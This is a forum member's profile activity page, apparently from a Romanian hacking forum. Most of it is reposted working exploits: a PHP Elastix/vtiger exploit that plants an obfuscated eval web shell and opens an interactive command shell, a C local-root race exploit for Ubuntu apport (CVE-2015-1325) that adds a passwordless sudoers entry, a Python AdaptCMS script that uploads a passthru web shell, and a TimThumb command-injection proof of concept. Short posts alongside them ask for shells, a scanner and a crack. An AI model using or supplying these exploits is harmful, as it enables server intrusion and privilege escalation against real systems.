Jump to content

a.linm

Members
  • Posts

    11
  • Joined

  • Last visited

About a.linm

  • Birthday 05/07/1975

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

a.linm's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. cati bani vrei pe extractoarele alea 2

    1. unic

      unic

      Lasa-mi un id de mess sau jabber sa putem vorbi

    2. a.linm

      a.linm

      wassup@jabbim.cz

  2. Dati-mi un pm cu adresa de mail pentru a primi invitatia
  3. cine ma poate ajuta cu un scanner de nologine care le si salveaza
  4. <? echo "n+-------------------------------------------+n"; echo "| Elastix <= 2.4 |n"; echo "| PHP Code Injection Exploit |n"; echo "| By i-Hmx |n"; echo "| sec4ever.com |n"; echo "| n0p1337@gmail.com |n"; echo "+-------------------------------------------+n"; echo "n| Enter Target [https://ip] # "; $target=trim(fgets(STDIN)); $inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo=")); ?>'; $faf=fopen("fa.txt","w+"); fwrite($faf,$inj); fclose($faf); $myf='fa.txt'; $url = $target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00"; // URL $reffer = "http://1337s.cc/index.php"; $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"; $cookie_file_path = "/"; echo "| Injecting 1st payloadn"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf))); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, $reffer); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); curl_close($ch); //echo $result; echo "| Injecting 2nd payloadn"; function faget($url,$post){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_POSTFIELDS,$post); curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); curl_setopt($curl, CURLOPT_HEADER, true); $exec=curl_exec($curl); curl_close($curl); return $exec; } function kastr($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } $me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00",""); echo "| Testing total payloadn"; $total=faget($target."/vtigercrm/farsawy.php","pwd=1337"); if(!eregi("Faris on the mic :D",$total)) { die("[+] Exploitation Failedn"); } echo "| Sending CMD test packagen"; $cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw=="); if(!eregi("farsawy",$cmd)) { echo " + Cmd couldn't executed but we can evaluate php coden + use : $target//vtigercrm/fa.phpn Post : fa=base64coden"; } echo "| sec4ever shell online ;)nn"; $host=str_replace('https://','',$target); while(1){ echo "i-Hmx@$host# "; $c=trim(fgets(STDIN)); if($c=='exit'){die("[+] Terminatingn");} $payload=base64_encode("passthru('$c');"); $fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload"); $done=kastr($fuck,"-----------------","-----------------"); echo "$donen"; } /* I dont even remember when i exploited this shit! maybe on 2013?! whatever , Hope its not sold as 0day in the near future xDD */ ?> https://cxsecurity.com/issue/WLB-2015090035
  5. un re-upload pentru gammadyne + crack ?
  6. ma intereseaza si pe mine 50 de shelluri
  7. /* # Exploit Title: apport/ubuntu local root race condition # Date: 2015-05-11 # Exploit Author: rebel # Version: ubuntu 14.04, 14.10, 15.04 # Tested on: ubuntu 14.04, 14.10, 15.04 # CVE : CVE-2015-1325 *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1325 / apport-pid-race.c apport race conditions ubuntu local root tested on ubuntu server 14.04, 14.10, 15.04 core dropping bug also works on older versions, but you can't write arbitrary contents. on 12.04 /etc/logrotate.d might work, didn't check. sudo and cron will complain if you drop a real ELF core file in sudoers.d/cron.d unpriv@ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race created /var/crash/_bin_sleep.1002.crash crasher: my pid is 1308 apport stopped, pid = 1309 getting pid 1308 current pid = 1307..2500..5000..7500..10000........ ** child: current pid = 1308 ** child: executing /bin/su Password: sleeping 2s.. checker: mode 4532 waiting for file to be unlinked..writing to fifo fifo written.. wait... waiting for /etc/sudoers.d/core to appear.. checker: new mode 32768 .. done checker: SIGCONT checker: writing core checker: done success # id uid=0(root) gid=0(root) groups=0(root) 85ad63cf7248d7da46e55fa1b1c6fe01dea43749 2015-05-10 %rebel% *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/resource.h> #include <unistd.h> #include <string.h> #include <sys/wait.h> char *crash_report = "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\nDate: Sat May 9 18:18:33 2015\nDistroRelease: Ubuntu 15.04\nExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\nProcCmdline: sleep 1337\nProcCwd: /home/rebel\nProcEnviron:\n XDG_RUNTIME_DIR=<set>\nProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 393307 /bin/sleep\nProcStatus:\n Name: sleep\nSignal: 11\nUname: Linux 3.19.0-15-generic x86_64\nUserGroups:\n_LogindSession: 23\nCoreDump: base64\n H4sICAAAAAAC/0NvcmVEdW1wAA==\n U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n"; /* last line is the stuff we write to the corefile c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS) t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n' # need some non-ASCII bytes so it doesn't turn into a str() # which makes apport fail with the following error: # os.write(core_file, r['CoreDump']) # TypeError: 'str' does not support the buffer interface t = bytes(t,'latin1') c.compress(t) a = c.flush() import base64 base64.b64encode(a) # b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==' */ int apport_pid; char report[128]; void steal_pid(int wanted_pid) { int x, pid; pid = getpid(); fprintf(stderr,"getting pid %d\n", wanted_pid); fprintf(stderr,"current pid = %d..", pid); for(x = 0; x < 500000; x++) { pid = fork(); if(pid == 0) { pid = getpid(); if(pid % 2500 == 0) fprintf(stderr,"%d..", pid); if(pid == wanted_pid) { fprintf(stderr,"\n** child: current pid = %d\n", pid); fprintf(stderr,"** child: executing /bin/su\n"); execl("/bin/su", "su", NULL); } exit(0); return; } if(pid == wanted_pid) return; wait(NULL); } } void checker(void) { struct stat s; int fd, mode, x; stat(report, &s); fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode); mode = s.st_mode; while(1) { // poor man's pseudo-singlestepping kill(apport_pid, SIGCONT); kill(apport_pid, SIGSTOP); // need to wait a bit for the signals to be handled, // otherwise we'll miss when the new report file is created for(x = 0; x < 100000; x++); stat(report, &s); if(s.st_mode != mode) break; } fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode); unlink(report); mknod(report, S_IFIFO | 0666, 0); fprintf(stderr,"checker: SIGCONT\n"); kill(apport_pid, SIGCONT); fprintf(stderr,"checker: writing core\n"); fd = open(report, O_WRONLY); write(fd, crash_report, strlen(crash_report)); close(fd); fprintf(stderr,"checker: done\n"); while(1) sleep(1); } void crasher() { chdir("/etc/sudoers.d"); fprintf(stderr,"crasher: my pid is %d\n", getpid()); execl("/bin/sleep", "sleep", "1337", NULL); exit(0); } int main(void) { int pid, checker_pid, fd; struct rlimit limits; struct stat s; limits.rlim_cur = RLIM_INFINITY; limits.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &limits); pid = fork(); if(pid == 0) crasher(); sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid()); unlink(report); mknod(report, S_IFIFO | 0666, 0); fprintf(stderr,"created %s\n", report); usleep(300000); kill(pid, 11); apport_pid = pid + 1; // could check that pid+1 is actually apport here but it's // kind of likely fprintf(stderr,"apport stopped, pid = %d\n", apport_pid); usleep(300000); kill(pid, 9); steal_pid(pid); sleep(1); kill(apport_pid, SIGSTOP); checker_pid = fork(); if(checker_pid == 0) { checker(); exit(0); } fprintf(stderr,"sleeping 2s..\n"); sleep(2); fprintf(stderr,"writing to fifo\n"); fd = open(report, O_WRONLY); write(fd, crash_report, strlen(crash_report)); close(fd); fprintf(stderr,"fifo written.. wait...\n"); fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n"); while(1) { stat("/etc/sudoers.d/core", &s); if(s.st_size == 37) break; usleep(100000); } fprintf(stderr,"success\n"); kill(pid, 9); kill(checker_pid, 9); return system("sudo -- sh -c 'stty echo;sh -i'"); } https://www.exploit-db.com/exploits/37088/
  8. Popcorn Time - Watch movies and TV shows instantly! filme si seriale moca enjoy
  9. #!/usr/bin/env python # # # AdaptCMS 3.0.3 Remote Command Execution Exploit # # # Vendor: Insane Visions # Product web page: AdaptCMS | Home | Content Management System # Affected version: 3.0.3 # # Summary: AdaptCMS is a Content Management System trying # to be both simple and easy to use, as well as very agile # and extendable. Not only so we can easily create Plugins # or additions, but so other developers can get involved. # Using CakePHP we are able to achieve this with a built-in # plugin system and MVC setup, allowing us to focus on the # details and end-users to focus on building their website # to look and feel great. # # Desc: AdaptCMS suffers from an authenticated arbitrary # command execution vulnerability. The issue is caused due # to the improper verification of uploaded files. This can # be exploited to execute arbitrary PHP code by creating # or uploading a malicious PHP script file that will be # stored in '\app\webroot\uploads' directory. # # Tested on: Apache 2.4.10 (Win32) # PHP 5.6.3 # MySQL 5.6.21 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5220 # Advisory URL: Zero Science Lab » AdaptCMS 3.0.3 Remote Command Execution Exploit # # # 29.12.2014 # # import itertools, mimetools, mimetypes, os import cookielib, urllib, urllib2, sys, re from cStringIO import StringIO from urllib2 import URLError piton = os.path.basename(sys.argv[0]) def bannerche(): print """ o==========================================o | | | AdaptCMS RCE Exploit | | | | ID:ZSL-2015-5220 | | o/ | +------------------------------------------+ """ if len(sys.argv) < 3: print '\x20\x20[*] Usage: '+piton+' <hostname> <pathname>' print '\x20\x20[*] Example: '+piton+' zeroscience.mk adaptcms\n' sys.exit() bannerche() host = sys.argv[1] path = sys.argv[2] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) try: gettokens = opener.open('http://'+host+'/'+path+'/login') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print 'Path error.' sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print 'Hostname error.' sys.exit() print '\x20\x20[*] Login please.' tokenfields = re.search('fields]" value="(.+?)" id=', gettokens.read()).group(1) gettokens = opener.open('http://'+host+'/'+path+'/login') tokenkey = re.search('key]" value="(.+?)" id=', gettokens.read()).group(1) username = raw_input('\x20\x20[*] Enter username: ') password = raw_input('\x20\x20[*] Enter password: ') login_data = urllib.urlencode({ '_method' : 'POST', 'data[user][username]' : username, 'data[user][password]' : password, 'data[_Token][fields]' : '864206fbf949830ca94401a65660278ae7d065b3%3A', 'data[_Token][key]' : tokenkey, 'data[_Token][unlocked]' : '' }) login = opener.open('http://'+host+'/'+path+'/login', login_data) auth = login.read() for session in cj: sessid = session.name ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) cookie = ses_chk.group(0) print '\x20\x20[*] Accessing...' upload = opener.open('http://'+host+'/'+path+'/admin/files/add') filetoken = re.search('key]" value="(.+?)" id=', upload.read()).group(1) class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('_method', 'POST') form.add_field('data[_Token][key]', filetoken) form.add_field('data[File][type]', 'edit') form.add_field('data[0][File][filename]', '') form.add_field('data[0][File][dir]', 'uploads/') form.add_field('data[0][File][mimetype]', '') form.add_field('data[0][File][filesize]', '') form.add_field('data[File][content]', '<?php echo "<pre>"; passthru($_GET[\'cmd\']); echo "</pre>"; ?>') form.add_field('data[File][file_extension]', 'php') form.add_field('data[File][file_name]', 'thricer') form.add_field('data[File][caption]', 'THESHELL') form.add_field('data[File][dir]', 'uploads/') form.add_field('data[0][File][caption]', '') form.add_field('data[0][File][watermark]', '0') form.add_field('data[0][File][zoom]', 'C') form.add_field('data[File][resize_width]', '') form.add_field('data[File][resize_height]', '') form.add_field('data[0][File][random_filename]', '0') form.add_field('data[File][library]', '') form.add_field('data[_Token][fields]', '0e50b5f22866de5e6f3b959ace9768ea7a63ff3c%3A0.File.dir%7C0.File.filesize%7C0.File.mimetype%7CFile.dir') form.add_file('data[0][File][filename]', 'filename', fileHandle=StringIO('')) request = urllib2.Request('http://'+host+'/'+path+'/admin/files/add') request.add_header('User-agent', 'joxypoxy 6.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() f_loc = '/uploads/thricer.php' print while True: try: cmd = raw_input('shell@'+host+':~# ') execute = opener.open('http://'+host+'/'+path+f_loc+'?cmd='+urllib.quote(cmd)) reverse = execute.read() pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M) cmdout = pattern.match(reverse) print cmdout.groups()[0].strip() print if cmd.strip() == 'exit': break except Exception: break print 'Session terminated.\n' sys.exit() AdaptCMS 3.0.3 Remote Command Execution - CXSecurity.com
  10. ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) # Affected website : a lot Wordpress Themes, Plugins, 3rd party components # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : June 24, 2014 # # Special Thanks to 2600 Thailand group # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio # https://www.facebook.com/groups/2600Thailand/ , Home | 2600 Thailand # ######################################################################## [+] Description ============================================================ TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications. Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes. TimThumb - PHP Image Resizer https://code.google.com/p/timthumb/ The original project WordThumb 1.07 also vulnerable ( https://code.google.com/p/wordthumb/) They both shared exactly the same WebShot code! And there are several projects that shipped with "timthumb.php", such as,@u0x (Pichaya Morimoto) Wordpress Gallery Plugin https://wordpress.org/plugins/wordpress-gallery-plugin/ IGIT Posts Slider Widget WordPress › IGIT Posts Slider Widget « WordPress Plugins All themes from Themify - Drag & Drop WordPress Themes contains vulnerable "wordthumb" in "<theme-name>/themify/img.php". [+] Exploit ============================================================ http:// <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// <wp-website>$(<os-cmds>) ** Note that OS commands payload MUST be within following character sets: [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=] ** Spaces, Pipe, GT sign are not allowed. ** This WebShot feature is DISABLED by default. ** CutyCapt and XVFB must be installed in constants. [+] Proof-of-Concept ============================================================ There are couple techniques that can be used to bypass limited charsets but I will use a shell variable $IFS insteads of space in this scenario. PoC Environment: Ubuntu 14.04 LTS PHP 5.5.9 Wordpress 3.9.1 Themify Parallax Theme 1.5.2 WordThumb 1.07 Crafted Exploit: http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/t mp/longcat) GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 Host: longcatlab.local Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 HTTP/1.1 400 Bad Request Date: Tue, 24 Jun 2014 07:20:48 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 3059 Connection: close Content-Type: text/html … <a href='http://www.php.net/function.getimagesize' target='_new'>getimagesize</a> ( )</td><td title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> </table></font> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br /><ul><li>The image being resized is not a valid gif, jpg or png.</li></ul><br /><br />Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : 1.07</pre> Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ↠start script ... public static function start(){ $tim = new timthumb(); ↠create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ↠set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ↠prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ↠HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ↠this pre-defined constant must be true ... $this->serveWebshot(); ↠call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ↠check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ↠check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ↠check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ↠check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ↠OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ↠OS shell command injection } ... $out = `$command`; ↠execute $command as shell command "PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - PHP: Execution Operators - Manual "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution.
  11. vreau si eu un cont daca se poate ! mersi
  12. link-ul nu mai este valabil de unde il pot lua si eu ?
×
×
  • Create New...